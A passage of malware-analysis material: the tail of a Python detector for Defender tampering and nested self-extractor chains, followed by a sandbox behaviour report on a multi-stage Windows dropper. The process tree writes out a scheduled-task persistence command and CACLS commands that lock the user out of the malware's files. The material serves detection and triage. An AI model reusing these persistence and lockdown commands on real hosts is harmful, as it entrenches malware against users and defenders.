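    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            vtype, key, value, proc = m.groups()
            rows.append({"type": vtype, "key": key, "value": value, "process": proc})
    return rows


RTP_POLICY = "\\windows defender\\real-time protection\\"
TAMPER_VALUE = "\\windows defender\\features\\tamperprotection"


def defender_tampering(rows):
    """Rows that switch off a real-time protection component or tamper protection."""
    findings = []
    for r in rows:
        key = r["key"].lower()
        name = r["key"].rsplit("\\", 1)[-1]  # value name is the last path component
        if RTP_POLICY in key and name.lower().startswith("disable") and r["value"] == "1":
            findings.append((r["process"], name, "real-time protection component disabled by policy"))
        elif key.endswith(TAMPER_VALUE) and r["value"] == "0":
            findings.append((r["process"], name, "tamper protection switched off"))
    return findings


IXP_RE = re.compile(r"IXP(\d{3})\.TMP", re.IGNORECASE)
CLEANUP_RE = re.compile(r"\\RunOnce\\wextract_cleanup\d+$", re.IGNORECASE)


def sfx_chain(rows):
    """Map each IXPnnn.TMP directory to the executable that extracted into it.

    wextract.exe unpacks an IExpress package into a TEMP directory named IXPnnn.TMP
    and writes a RunOnce wextract_cleanupN value so that advpack.dll,DelNodeRunDLL32
    deletes that directory at next logon. The value is clean-up, not persistence;
    parent_level tells whether the extractor was itself unpacked by an earlier level.
    """
    chain = []
    for r in rows:
        if not CLEANUP_RE.search(r["key"]) or "DelNodeRunDLL32" not in r["value"]:
            continue
        target = IXP_RE.search(r["value"])
        if not target:
            continue
        parent = IXP_RE.search(r["process"])
        chain.append({"level": int(target.group(1)),
                      "created_by": r["process"],
                      "parent_level": int(parent.group(1)) if parent else None})
    return sorted(chain, key=lambda c: c["level"])


def nesting_depth(chain):
    """Number of self-extractor layers seen (0 when no wextract rows were present)."""
    return max((c["level"] for c in chain), default=-1) + 1


if __name__ == "__main__":
    rows = parse_set_value_rows(SAMPLE_ROWS)
    for proc, name, why in defender_tampering(rows):
        print(f"{proc}: {name} -> {why}")
    for c in sfx_chain(rows):
        print(f"IXP{c['level']:03d}.TMP created by {c['created_by']} (parent level {c['parent_level']})")
    print("nesting depth:", nesting_depth(sfx_chain(rows)))
```

The sandbox logs the write, not its effect: where Tamper Protection is on, Defender blocks registry and policy changes to these real-time protection settings, so on a live host pair a finding like this with `Get-MpComputerStatus` (`RealTimeProtectionEnabled`, `IsTamperProtected`) or with Defender event ID 5001 (real-time protection disabled) before concluding that the agent was blinded. The `wextract_cleanup` chain, on the other hand, is worth keeping as a triage fact: the deepest `IXPnnn.TMP` directory is where the final-stage executables were written, and the cleanup value will erase that evidence at the next logon.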

Legitimate hosting services abused for malware hosting/C2

Detected potential entity reuse from brand microsoft.

phishing microsoft

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A (62 identical rows: no description, indicator, process or target recorded)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7B00.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\75BF.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4988 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 4988 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 4988 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 2208 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2208 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2208 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 1604 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2208 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe
PID 2208 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe
PID 2208 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4988 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c2929078.exe
PID 4988 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c2929078.exe
PID 4988 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c2929078.exe
PID 2540 wrote to memory of 3328 N/A N/A C:\Users\Admin\AppData\Local\Temp\1102.exe
PID 2540 wrote to memory of 3328 N/A N/A C:\Users\Admin\AppData\Local\Temp\1102.exe
PID 2540 wrote to memory of 3328 N/A N/A C:\Users\Admin\AppData\Local\Temp\1102.exe
PID 2540 wrote to memory of 3092 N/A N/A C:\Users\Admin\AppData\Local\Temp\122C.exe
PID 2540 wrote to memory of 3092 N/A N/A C:\Users\Admin\AppData\Local\Temp\122C.exe
PID 2540 wrote to memory of 3092 N/A N/A C:\Users\Admin\AppData\Local\Temp\122C.exe
PID 3328 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\1102.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe
PID 3328 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\1102.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe
PID 3328 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\1102.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe
PID 2540 wrote to memory of 2228 N/A N/A C:\Users\Admin\AppData\Local\Temp\12E9.bat
PID 2540 wrote to memory of 2228 N/A N/A C:\Users\Admin\AppData\Local\Temp\12E9.bat
PID 2540 wrote to memory of 2228 N/A N/A C:\Users\Admin\AppData\Local\Temp\12E9.bat
PID 5096 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe
PID 5096 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe
PID 5096 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe
PID 4792 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe
PID 4792 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe
PID 4792 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe
PID 2540 wrote to memory of 2736 N/A N/A C:\Users\Admin\AppData\Local\Temp\1480.exe
PID 2540 wrote to memory of 2736 N/A N/A C:\Users\Admin\AppData\Local\Temp\1480.exe
PID 2540 wrote to memory of 2736 N/A N/A C:\Users\Admin\AppData\Local\Temp\1480.exe
PID 3788 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe
PID 3788 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe
PID 3788 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe
PID 2156 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WK02es6.exe
PID 2156 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WK02es6.exe
PID 2156 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WK02es6.exe
PID 2540 wrote to memory of 1956 N/A N/A C:\Users\Admin\AppData\Local\Temp\15C9.exe
PID 2540 wrote to memory of 1956 N/A N/A C:\Users\Admin\AppData\Local\Temp\15C9.exe
PID 3092 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\122C.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3092 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\122C.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3092 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\122C.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3092 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\122C.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3092 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\122C.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3092 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\122C.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3092 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\122C.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1604 -ip 1604

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 148

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4780 -ip 4780

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3416 -ip 3416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c2929078.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c2929078.exe

C:\Users\Admin\AppData\Local\Temp\1102.exe

C:\Users\Admin\AppData\Local\Temp\1102.exe

C:\Users\Admin\AppData\Local\Temp\122C.exe

C:\Users\Admin\AppData\Local\Temp\122C.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe

C:\Users\Admin\AppData\Local\Temp\12E9.bat

"C:\Users\Admin\AppData\Local\Temp\12E9.bat"

C:\Users\Admin\AppData\Local\Temp\1480.exe

C:\Users\Admin\AppData\Local\Temp\1480.exe

C:\Users\Admin\AppData\Local\Temp\15C9.exe

C:\Users\Admin\AppData\Local\Temp\15C9.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WK02es6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WK02es6.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\13B2.tmp\13B3.tmp\13B4.bat C:\Users\Admin\AppData\Local\Temp\12E9.bat"

C:\Users\Admin\AppData\Local\Temp\1983.exe

C:\Users\Admin\AppData\Local\Temp\1983.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3092 -ip 3092

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1716 -ip 1716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2736 -ip 2736

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3784 -ip 3784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 384

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 540

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2NB190Af.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2NB190Af.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

